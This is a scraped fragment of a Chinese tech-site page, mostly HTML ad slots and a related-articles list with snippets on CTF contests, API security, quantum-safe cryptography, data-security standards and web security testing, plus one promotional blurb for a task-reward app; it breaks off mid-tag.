class="youdao-fixed-ad" id="detail_ad_2"></div> </div> <!-- 文章页-右侧3 动态广告位 --> <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(安全技术)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1949571235587354624.htm" title="赏帮赚做任务危险吗赏帮赚是正规平台吗(下几个方面进行解答:)" target="_blank">赏帮赚做任务危险吗赏帮赚是正规平台吗(下几个方面进行解答:)</a> <span class="text-muted">小易的生活</span> <div>关于赏帮赚做任务是否危险以及赏帮赚是否是正规平台的问题,可以从以下几个方面进行解答:一、赏帮赚是否是正规平台浏览器扫码注册下载即可享受最高权限码↓赏帮赚是一个正规的平台。首先,赏帮赚拥有国家颁发的《互联网经营许可证》,这表明其具备合法经营的资质。其次,赏帮赚通过了国家的严格审核,并且由国内顶尖的安全技术团队打造,能够保障用户的信息和资金安全。此外,赏帮赚的运营主体是广州脉络科技有限公司(或根据最新</div> </li> <li><a href="/article/1949369892947947520.htm" title="CTF入门教程(非常详细)从零基础入门到竞赛,看这一篇就够了!" target="_blank">CTF入门教程(非常详细)从零基础入门到竞赛,看这一篇就够了!</a> <span class="text-muted">网络安全宇哥</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%9E%B6%E6%9E%84/1.htm">安全架构</a> <div>一、CTF简介CTF(CaptureTheFlag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCONCT</div> </li> <li><a href="/article/1949224880994054144.htm" title="技战法-API接口全面掌握提升防御度" target="_blank">技战法-API接口全面掌握提升防御度</a> <span class="text-muted">YCL大摆子</span> <a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>一、背景近年来,随着网络安全技术的快速发展和安全开发意识的普遍增强,网站、应用程序(APP)及客户端等现代信息系统的架构设计已逐步完成向"前后端分离"模式的转型。应用程序编程接口(API)的应用场景,也从早期仅服务于软件内部模块间通信的封闭形态,逐步扩展为支撑互联网开放生态的核心基础设施。第三方调用者通过调用API即可获取目标服务,无需深入了解系统源码或内部运行机制即可实现功能集成。作为连接不同软</div> </li> <li><a href="/article/1948906138997157888.htm" title="量子安全技术的工作详细原理、过程、架构和案例" target="_blank">量子安全技术的工作详细原理、过程、架构和案例</a> <span class="text-muted"></span> <div>大家读完觉得有帮助记得关注和点赞!!!量子安全技术是应对量子计算威胁的新一代加密体系,其核心在于利用量子力学原理或数学难题构建“抗量子破解”的安全屏障。以下从原理、流程、架构及案例四个维度展开详解:一、工作原理:量子力学与密码学的融合1.量子密钥分发(QKD)量子不可克隆定理:任何窃听行为都会扰动光子量子态(如偏振态或相位态),通信双方可通过误码率检测窃听(误码率>阈值即终止通信)14。编码技术:</div> </li> <li><a href="/article/1948620350443024384.htm" title="计算机网络采用分层有哪些好处,网络协议分层的优点" target="_blank">计算机网络采用分层有哪些好处,网络协议分层的优点</a> <span class="text-muted">温卡龙</span> <a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E9%87%87%E7%94%A8%E5%88%86%E5%B1%82%E6%9C%89%E5%93%AA%E4%BA%9B%E5%A5%BD%E5%A4%84/1.htm">计算机网络采用分层有哪些好处</a> <div>分层网络协议是计算机术语。网络协议分层的优点你知道吗?计算机网络安全有哪些基本注意事项,一起和佰佰安全网看看吧。网络安全是一个关系国家安全和主权、社会的稳定、民族文化的继承和发扬的重要问题。其重要性,正随着全球信息化步伐的加快而变到越来越重要。“家门就是国门”,安全问题刻不容缓。网络安全是一门涉及计算机科学、网络技术、通信技术、密码技术、信息安全技术、应用数学、数论、信息论等多种学科的综合性学科。</div> </li> <li><a href="/article/1947872667663134720.htm" title="专属私有云满足密评要求啥意思?密评是什么?为什么专有云需要进行密评?到底那些系统需要密评?" target="_blank">专属私有云满足密评要求啥意思?密评是什么?为什么专有云需要进行密评?到底那些系统需要密评?</a> <span class="text-muted">文章永久免费只为良心</span> <a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a> <div>“专属私有云满足密评要求”指该私有云平台的设计、技术实现及运维管理,全面符合国家《信息安全技术信息系统密码应用基本要求》(GB/T39786-2021)等法规的密码安全标准,通过权威机构评测(如等保三级、密评三级),确保数据全链路安全可控。以下是具体解析:一、密评的核心要求与专属私有云的适配性密评(商用密码应用安全性评估)是国家密码管理局对信息系统密码应用合规性的强制性检测,重点评估以下方面:密码</div> </li> <li><a href="/article/1947247523085217792.htm" title="如何打CTF竞赛?" target="_blank">如何打CTF竞赛?</a> <span class="text-muted">jieyu1119</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>一、首先需要认识CTF竞赛1、什么是CTF竞赛?CTF(CaptureTheFlag)一般译作“夺旗赛”,在网络安全领域中指网络安全技术人员之间进行技术竞技的一种比赛形式。[11]通过各种攻击手法,获取服务器后寻找指定的字段,或者文件中某一个固定格式的字段,这个字段叫做Flag,其形式一般为Flag{xxxxxxxX},提交到裁判机就可以得分。2、竞赛模式解题模式(Jeopardy)在解题模式CT</div> </li> <li><a href="/article/1946917543524495360.htm" title="新兴市场股市估值与智能电网网络安全技术的互动" target="_blank">新兴市场股市估值与智能电网网络安全技术的互动</a> <span class="text-muted">SuperAGI2025</span> <a class="tag" taget="_blank" href="/search/AI%E5%A4%A7%E6%A8%A1%E5%9E%8B%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91%E5%AE%9D%E5%85%B8/1.htm">AI大模型应用开发宝典</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/ai/1.htm">ai</a> <div>新兴市场股市估值与智能电网网络安全技术的互动关键词:新兴市场股市估值、智能电网网络安全技术、互动关系、金融市场、电力行业、风险评估、技术驱动摘要:本文旨在深入探讨新兴市场股市估值与智能电网网络安全技术之间的互动关系。通过对新兴市场股市估值的影响因素、智能电网网络安全技术的重要性及发展现状的分析,阐述两者相互作用的内在机制。利用数学模型和算法原理,结合实际案例,揭示这种互动对金融市场和电力行业的影响</div> </li> <li><a href="/article/1946672364137803776.htm" title="【TCP/IP】20. 因特网安全" target="_blank">【TCP/IP】20. 因特网安全</a> <span class="text-muted">熬夜超级玩家</span> <a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/TCP%2FIP/1.htm">TCP/IP</a><a class="tag" taget="_blank" href="/search/tcp%2Fip/1.htm">tcp/ip</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/1.htm">网络协议</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>20.因特网安全20.因特网安全20.1安全威胁20.2安全服务20.3基本安全技术20.3.1密码技术20.3.2报文鉴别技术20.3.3身份认证技术20.3.4数字签名技术20.3.5虚拟专用网(VPN)技术20.3.6防火墙技术20.3.7防病毒技术20.4IP层安全20.5传输层安全20.6应用层安全20.6.1安全超文本传输协议(S-HTTP)20.6.2电子邮件安全(S/MIME)本章</div> </li> <li><a href="/article/1943388658618920960.htm" title="用XDR的思路保护API安全" target="_blank">用XDR的思路保护API安全</a> <span class="text-muted">Akamai中国</span> <a class="tag" taget="_blank" href="/search/%E4%BA%91%E8%AE%A1%E7%AE%97/1.htm">云计算</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E4%BA%91%E8%AE%A1%E7%AE%97/1.htm">云计算</a><a class="tag" taget="_blank" href="/search/%E5%88%86%E5%B8%83%E5%BC%8F/1.htm">分布式</a><a class="tag" taget="_blank" href="/search/%E4%BA%91%E5%8E%9F%E7%94%9F/1.htm">云原生</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a><a class="tag" taget="_blank" href="/search/Akamai/1.htm">Akamai</a> <div>云计算飞速发展的今天,越来越多应用程序已经转为选择云原生架构,这就少不了Serverless、微服务、API等技术的协助。但同时也有越来越多的企业认识到,一定程度的“API安全”在整体安全与合规态势中发挥着至关重要的作用。然而,对很多企业来说,可能并不太明确API安全技术投资在其更广泛安全栈中的位置。两个关键问题随着时间推移,许多安全孤岛已经逐步发展,开始包含更统一的扩展检测和响应(XDR,Ext</div> </li> <li><a href="/article/1943345799387738112.htm" title="标准引领|美创参编两项国家标准正式发布!" target="_blank">标准引领|美创参编两项国家标准正式发布!</a> <span class="text-muted"></span> <div>安全发展标准先行近日,国家标准化领域传来喜讯!杭州美创科技股份有限公司深度参与编制的两项国家标准,于2025年6月30日正式发布,并将于2026年1月1日起正式实施。GB/T20988-2025《网络安全技术信息系统灾难恢复规范》GB/T45909-2025《网络安全技术数字水印技术实现指南》GB/T20988-2025《网络安全技术信息系统灾难恢复规范》GB/T20988-2025《网络安全技术</div> </li> <li><a href="/article/1941422943791804416.htm" title="HarmonyOS免密认证方案 助力应用登录安全升级" target="_blank">HarmonyOS免密认证方案 助力应用登录安全升级</a> <span class="text-muted">HarmonyOS SDK</span> <a class="tag" taget="_blank" href="/search/%E5%BA%94%E7%94%A8%E5%9C%BA%E6%99%AF/1.htm">应用场景</a><a class="tag" taget="_blank" href="/search/harmonyos/1.htm">harmonyos</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%8D%8E%E4%B8%BA/1.htm">华为</a> <div>6月21日,2025年华为开发者大会"安全与隐私分论坛"在松山湖顺利举办。本论坛聚焦App治理与监管、星盾安全2.0的核心能力等进行深度分享与探讨。其中,HarmonyOSPasskey免密认证方案作为安全技术创新成果备受瞩目。该方案基于FIDO协议实现,支持用户在应用内、网页上乃至跨设备间实现无缝且安全的免密登录体验。火山引擎飞连作为伙伴代表,在现场分享了基于HarmonyOSPasskey免密</div> </li> <li><a href="/article/1939679724745846784.htm" title="AMD机密计算虚拟机介绍" target="_blank">AMD机密计算虚拟机介绍</a> <span class="text-muted">李天琦</span> <a class="tag" taget="_blank" href="/search/%E4%BA%91%E8%AE%A1%E7%AE%97/1.htm">云计算</a><a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E4%BA%BA%E7%94%9F/1.htm">程序人生</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/AMD%E6%9C%BA%E5%AF%86%E8%AE%A1%E7%AE%97/1.htm">AMD机密计算</a><a class="tag" taget="_blank" href="/search/%E6%9C%BA%E5%AF%86%E8%AE%A1%E7%AE%97%E4%BA%91%E4%B8%BB%E6%9C%BA/1.htm">机密计算云主机</a><a class="tag" taget="_blank" href="/search/%E8%99%9A%E6%8B%9F%E5%8C%96/1.htm">虚拟化</a> <div>一、什么机密计算虚拟机机密计算虚拟机是一种基于硬件安全技术(如AMDSecureEncryptedVirtualization,SEV)的虚拟化环境,旨在保护虚拟机(VM)的运行中数据(包括内存、CPU寄存器等)免受外部攻击或未经授权的访问,即使云服务提供商或管理员也无法窥探。AMD关键技术SEV(SecureEncryptedVirtualization):通过内存加密和密钥隔离,为每个虚拟机分</div> </li> <li><a href="/article/1939510925501460480.htm" title="中华人民共和国网络安全法" target="_blank">中华人民共和国网络安全法</a> <span class="text-muted">周周记笔记</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>链接:中华人民共和国网络安全法.pdf总则:明确立法目的是保障网络安全,维护网络空间主权和国家安全等,规定了本法适用范围,强调国家坚持网络安全与信息化发展并重的方针,确定了相关部门的网络安全监督管理职责,还对网络运营者义务、网络使用规范等作出原则性规定。网络安全支持与促进:国家建立和完善网络安全标准体系,扶持重点网络安全技术产业和项目,推进网络安全社会化服务体系建设,鼓励开发网络数据安全保护和利用</div> </li> <li><a href="/article/1939441351703719936.htm" title="超详细【WEB应用安全测试指南--蓝队安全测试1】--超级详细的安全测试渗透性测试知识点--可直接上手进行对应的安全测试!!!!!!" target="_blank">超详细【WEB应用安全测试指南--蓝队安全测试1】--超级详细的安全测试渗透性测试知识点--可直接上手进行对应的安全测试!!!!!!</a> <span class="text-muted">生活De°咸鱼</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E4%B8%93%E6%A0%8F/1.htm">安全专栏</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%80%A7%E6%B5%8B%E8%AF%95/1.htm">安全性测试</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E5%A8%81%E8%83%81%E5%88%86%E6%9E%90/1.htm">安全威胁分析</a> <div>一、概述1.1、编写目的结合公司的内部人员培养体系,本手册旨在为安全测试人员提供测试指导,安全测试人员通过查阅该指南可快速掌握Web应用安全测试,提高工作能力。1.2、使用范围本文适用于Web应用安全测试人员1.3、注意事项本文旨在为测试人员提供漏洞测试的基本思路,随着安全技术的发展,更多的新漏洞和测试方法将被爆出,安全测试人员应该具备不断学习新知识的能力。二、Web应用安全测试指南2.1、认证授</div> </li> <li><a href="/article/1939433534892601344.htm" title="第一章 城镇道路工程 1.5 安全质量控制" target="_blank">第一章 城镇道路工程 1.5 安全质量控制</a> <span class="text-muted">泽克</span> <a class="tag" taget="_blank" href="/search/%E4%B8%80%E5%BB%BA%E5%B8%82%E6%94%BF%E7%AB%A0%E8%8A%82%E5%A4%8D%E4%B9%A0/1.htm">一建市政章节复习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a> <div>1.5城镇道路工程安全质量控制1.5.1城镇道路工程安全技术要点1.管线及邻近建筑物的保护1.管线的保护取得详细资料,设施管理单位向施工、监理进行详细交底研究确定拆迁或保护加固方案、形成文件施工前进行详探,人工开挖探沟,结构以下先施工。施工现场做好标识、施工图做好标志加固部位定期检查、维护。专人监护2.邻近建筑物的保护施工前调查,获取相关数据。采取合理的施工方案和加固措施设置沉降、位移观察点,2.</div> </li> <li><a href="/article/1938404290683006976.htm" title="【信息安全管理与评估】2024年浙江省职业院校技能大赛高职组“信息安全管理与评估”赛项规程" target="_blank">【信息安全管理与评估】2024年浙江省职业院校技能大赛高职组“信息安全管理与评估”赛项规程</a> <span class="text-muted">2401_84302369</span> <a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>赛项归属产业:电子信息大类二、竞赛目的(一)引领教学改革通过本项目竞赛让参赛选手熟悉世界技能大赛网络安全项目的职业标准规范,检验参赛选手网络组建和安全运维、安全审计、网络安全应急响应、数字取证调查、应用程序安全和网络攻防渗透能力,检验参赛队计划组织和团队协作等综合职业素养,强调学生创新能力和实践能力培养,提升学生职业能力和就业质量。(二)强化专业建设该赛项衔接国家信息安全技术应用高职专业标准,竞赛</div> </li> <li><a href="/article/1938292325679689728.htm" title="未经安全处理退出使用计算机,4322【标准答案】单选题 1. 将未经安全技术处理的退出使用的涉密计算机、涉密存储设备____或者改作其他用途的。依法给予处分;构成犯罪的,依法追究刑事责任。 A: 赠送..." target="_blank">未经安全处理退出使用计算机,4322【标准答案】单选题 1. 将未经安全技术处理的退出使用的涉密计算机、涉密存储设备____或者改作其他用途的。依法给予处分;构成犯罪的,依法追究刑事责任。 A: 赠送...</a> <span class="text-muted">闲书郎</span> <a class="tag" taget="_blank" href="/search/%E6%9C%AA%E7%BB%8F%E5%AE%89%E5%85%A8%E5%A4%84%E7%90%86%E9%80%80%E5%87%BA%E4%BD%BF%E7%94%A8%E8%AE%A1%E7%AE%97%E6%9C%BA/1.htm">未经安全处理退出使用计算机</a> <div><>【标准答案】单选题1.将未经安全技术处理的退出使用的涉密计算机、涉密存储设备____或者改作其他用途的。依法给予处分;构成犯罪的,依法追究刑事责任。A:赠送B:出售C:丢弃D:以上都是习题:单选题1.将未经安全技术处理的退出使用的涉密计算机、涉密存储设备____或者改作其他用途的。依法给予处分;构成犯罪的,依法追究刑事责任。A:赠送B:出售C:丢弃D:以上都是、保存、维修和销毁,应当符合国家保</div> </li> <li><a href="/article/1935951922947223552.htm" title="Web安全性测试--超详细用例CASE整理总结" target="_blank">Web安全性测试--超详细用例CASE整理总结</a> <span class="text-muted">寻觅神话06</span> <a class="tag" taget="_blank" href="/search/%E4%B8%93%E9%A1%B9%E6%B5%8B%E8%AF%95/1.htm">专项测试</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%80%A7%E6%B5%8B%E8%AF%95/1.htm">安全性测试</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%89%AB/1.htm">漏扫</a> <div>一、漏洞扫描1.1等保要求要求:等保2.0《GB/736627-2018信息安全技术网络安全等级保护测试评估技术指南》中5.2.3漏洞扫描章节基本要求入侵防御章节1.2要求内容漏洞扫描的主要功能是针对主机和开放端口识别已知漏洞、提供建议降低漏洞风险;同时,有助于识别过时的软件版本、缺失的补丁和错误配置,并验证其与机构安全策略的一致性。进行漏洞扫描时,可考虑以下评估要素和评估原则:a)识别漏洞相关信</div> </li> <li><a href="/article/1935139096544473088.htm" title="基于大数据的数据挖掘、数据中台、数据安全架构设计方案:核心技术与架构、大数据平台与数据管理、建模平台与数据治理、应用案例与优势" target="_blank">基于大数据的数据挖掘、数据中台、数据安全架构设计方案:核心技术与架构、大数据平台与数据管理、建模平台与数据治理、应用案例与优势</a> <span class="text-muted">公众号:优享智库</span> <a class="tag" taget="_blank" href="/search/%E6%95%B0%E5%AD%97%E5%8C%96%E8%BD%AC%E5%9E%8B/1.htm">数字化转型</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E6%B2%BB%E7%90%86/1.htm">数据治理</a><a class="tag" taget="_blank" href="/search/%E4%B8%BB%E6%95%B0%E6%8D%AE/1.htm">主数据</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E4%BB%93%E5%BA%93/1.htm">数据仓库</a><a class="tag" taget="_blank" href="/search/%E5%A4%A7%E6%95%B0%E6%8D%AE/1.htm">大数据</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E6%8C%96%E6%8E%98/1.htm">数据挖掘</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a> <div>本文介绍了基于大数据的数据挖掘、数据中台、数据安全架构设计方案,涵盖了从技术架构到功能应用的全方位内容。核心技术与架构IT环境融合:构建了包含网关、云端、终端、物联网、反病毒技术、PC、核心层、物理机、IOT终端、基于操作系统的文件识别、反黑客技术、大数据技术、移动、汇聚层、虚拟化、工业控制系统、基于网络的协议解析、基于大数据的数据挖掘、信创、接入层、云/容器、工业互联网、身份安全技术、基于密码的</div> </li> <li><a href="/article/1934718544595972096.htm" title="网络安全护网行动正在进行中!" target="_blank">网络安全护网行动正在进行中!</a> <span class="text-muted">黑客飓风</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>护网行动2025关键信息盘点一、护网行动简介护网行动是由国家相关部门组织的国家级网络安全攻防演练,旨在通过真实环境下的攻防对抗:检验关键信息基础设施安全防护能力提升网络安全应急处置水平培养专业化网络安全人才推动网络安全技术创新二、2025年关键信息(预测版)项目预测时间说明行动启动2025年3月官方发布总体方案报名通道开放2025年5月-6月通过指定平台提交材料初筛审核2025年7月资质审查与技术</div> </li> <li><a href="/article/1933741163987136512.htm" title="VR 地震安全演练:“透视” 地震,筑牢企业安全新护盾" target="_blank">VR 地震安全演练:“透视” 地震,筑牢企业安全新护盾</a> <span class="text-muted"></span> <div>与传统的地震安全教育方式相比,VR地震安全技术具有无可比拟的优势。在过去漫长的岁月里,我们主要依赖书本、讲座和视频等较为常规的手段来了解地震知识和逃生技巧。书本上密密麻麻的文字以及静态的图片,虽然能够较为系统地传递理论性的信息,可对于缺乏实际经历的人们来说,仅仅依靠这些文字和图片,实在难以在脑海中构建起地震发生时的真实画面,那种直观感受的缺失使得知识的吸收大打折扣;讲座形式下,讲师站在台上滔滔不绝</div> </li> <li><a href="/article/1933285453239218176.htm" title="5G移动终端安全关键技术研究" target="_blank">5G移动终端安全关键技术研究</a> <span class="text-muted">罗伯特之技术屋</span> <a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%BB%9F%E5%92%8C%E7%90%86%E8%AE%BA%E4%B8%93%E6%A0%8F/1.htm">信息技术控制系统和理论专栏</a><a class="tag" taget="_blank" href="/search/5G/1.htm">5G</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>摘要首先分析了5G时代移动终端和移动通信面临的主要安全风险,进而对目前主流的终端安全技术如系统隔离技术和虚拟专网技术的现状和不足进行了总结。提出了满足高安全移动通信和移动办公要求的终端安全解决方案,包括基于硬件的系统隔离、门卫式内网VPN接入和系统间安全通信方案3个组成部分,系统性解决移动终端硬件、操作系统、应用、数据和网络通信安全问题。引言随着5G移动终端类型和应用场景不断丰富,移动终端从传统的</div> </li> <li><a href="/article/1933112337208766464.htm" title="物联网标识技术实验室解决方案" target="_blank">物联网标识技术实验室解决方案</a> <span class="text-muted">武汉唯众智创</span> <a class="tag" taget="_blank" href="/search/%E7%89%A9%E8%81%94%E7%BD%91/1.htm">物联网</a><a class="tag" taget="_blank" href="/search/%E7%89%A9%E8%81%94%E7%BD%91%E6%A0%87%E8%AF%86%E6%8A%80%E6%9C%AF%E5%AE%9E%E9%AA%8C%E5%AE%A4/1.htm">物联网标识技术实验室</a><a class="tag" taget="_blank" href="/search/%E7%89%A9%E8%81%94%E7%BD%91%E6%A0%87%E8%AF%86/1.htm">物联网标识</a><a class="tag" taget="_blank" href="/search/%E7%89%A9%E8%81%94%E7%BD%91%E6%A0%87%E8%AF%86%E6%8A%80%E6%9C%AF/1.htm">物联网标识技术</a><a class="tag" taget="_blank" href="/search/%E7%89%A9%E8%81%94%E7%BD%91%E5%AE%9E%E9%AA%8C%E5%AE%A4/1.htm">物联网实验室</a><a class="tag" taget="_blank" href="/search/%E7%89%A9%E8%81%94%E7%BD%91%E5%AE%9E%E8%AE%AD%E5%AE%A4/1.htm">物联网实训室</a><a class="tag" taget="_blank" href="/search/%E7%89%A9%E8%81%94%E7%BD%91%E6%A0%87%E8%AF%86%E6%8A%80%E6%9C%AF%E5%AE%9E%E8%AE%AD%E5%AE%A4/1.htm">物联网标识技术实训室</a> <div>一、实验室建设目标与意义1.1培养物联网专业人才物联网标识技术实验室的建设旨在为学生提供一个实践平台,以满足物联网专业人才培养的需求。物联网作为新兴技术领域,对人才的实践能力要求极高。通过配备条码扫码枪、二维码扫描设备、RFID阅读器、RFID标签、人脸识别门禁一体机等实验设备,实验室能够支持物联网标识技术、嵌入式系统开发、物联网信息安全技术、物联网系统集成开发、物联网工程设计与实施等多门课程的实</div> </li> <li><a href="/article/1932628212232286208.htm" title="量子安全:后量子时代" target="_blank">量子安全:后量子时代</a> <span class="text-muted">庸子</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E9%87%8F%E5%AD%90%E8%AE%A1%E7%AE%97/1.htm">量子计算</a> <div>目录引言:量子计算引发的安全范式颠覆量子计算机发展里程碑量子霸权对传统公钥密码体系的威胁时间窗预测量子威胁的本质战略意义:国家网络安全新边疆关键基础设施保护等级重构量子威胁深度解剖密码体系崩溃链分析攻击场景推演行业风险量化评估量子安全技术双轨制解决方案后量子密码学(PQC)NIST标准化进程深度解读迁移路线图三阶段量子密钥分发(QKD)物理层安全机制突破全球骨干网建设案例产业化落地挑战与突破技术瓶</div> </li> <li><a href="/article/1932227033555857408.htm" title="中国政务数据安全建设细化及市场需求分析" target="_blank">中国政务数据安全建设细化及市场需求分析</a> <span class="text-muted">深海科技服务</span> <a class="tag" taget="_blank" href="/search/%E8%A1%8C%E4%B8%9A%E5%8F%91%E5%B1%95/1.htm">行业发展</a><a class="tag" taget="_blank" href="/search/IT%E5%BA%94%E7%94%A8%E6%8E%A2%E8%AE%A8/1.htm">IT应用探讨</a><a class="tag" taget="_blank" href="/search/%E6%94%BF%E5%8A%A1/1.htm">政务</a><a class="tag" taget="_blank" href="/search/%E9%9C%80%E6%B1%82%E5%88%86%E6%9E%90/1.htm">需求分析</a> <div>(基于新《政务数据共享条例》及相关法规)一、引言近年来,中国政府高度重视数字政府建设和数据要素市场化配置改革。《政务数据共享条例》(以下简称“《共享条例》”)的发布,与《中华人民共和国数据安全法》(以下简称“《数据安全法》”)、《中华人民共和国个人信息保护法》(以下简称“《个保法》”)、《数据安全技术政务数据处理安全要求》(GB/T41479-2022)、《中华人民共和国网络安全法》(以下简称“《</div> </li> <li><a href="/article/1932034140446715904.htm" title="计算机网络信息系统安全问题及解决策略" target="_blank">计算机网络信息系统安全问题及解决策略</a> <span class="text-muted"></span> <div>目录摘要前言一、计算机网络信息系统研究现状及安全技术(一)计算机网络信息系统研究现状(二)计算机网络信息系统全技术概述二、计算机网络信息系统安全问题(一)环境危害引发的安全问题(二)信息资源共享带来的安全问题(三)黑客入侵病毒泛滥(四)软件及操作系统的安全问题三、计算机网络信息系统安全问题解决策略(一)加强物理安全防护(二)及时备份和恢复数据库内容(三)提升反病毒能力(四)提高软件及操作系统安全性</div> </li> <li><a href="/article/1931606484970434560.htm" title="国标GB/T 45577《数据安全风险评估方法》标准解读" target="_blank">国标GB/T 45577《数据安全风险评估方法》标准解读</a> <span class="text-muted">KKKlucifer</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>一、标准概述国家市场监督管理总局与国家标准化管理委员会于2025年4月25日联合发布的GB/T45577《数据安全技术数据安全风险评估方法》(以下简称“本标准”),是我国数据安全领域的重要推荐性国家标准,将于2025年11月1日正式实施。本标准以《数据安全法》《个人信息保护法》等上位法为依托,旨在为数据处理者、第三方评估机构及监管部门提供统一的风险评估框架,指导其系统识别数据全生命周期安全风险,提</div> </li> <li><a href="/article/1931409304615710720.htm" title="【网络信息安全体系】知识点总结" target="_blank">【网络信息安全体系】知识点总结</a> <span class="text-muted">秋说</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a> <div>未经许可,不得转载。文章目录信息系统安全的基本需求安全架构5A方法论安全架构5A方法论与信息安全属性的关系安全技术体系架构的二维模型信息系统防御策略的基本原则TCP/IP/ICMP/ARP/UDPHTTP/DNS/SMTP/Telnet/FTP/BBS主流操作系统及其安全问题UNIX中的权限码多种网络攻击与防范的基本原理邮件炸弹攻击Ping风暴攻击同步风暴攻击IP碎片攻击分布式拒绝服务攻击(DDo</div> </li> <li><a href="/article/1931406910733479936.htm" title="古典密码学介绍" target="_blank">古典密码学介绍</a> <span class="text-muted">weixin_47233946</span> <a class="tag" taget="_blank" 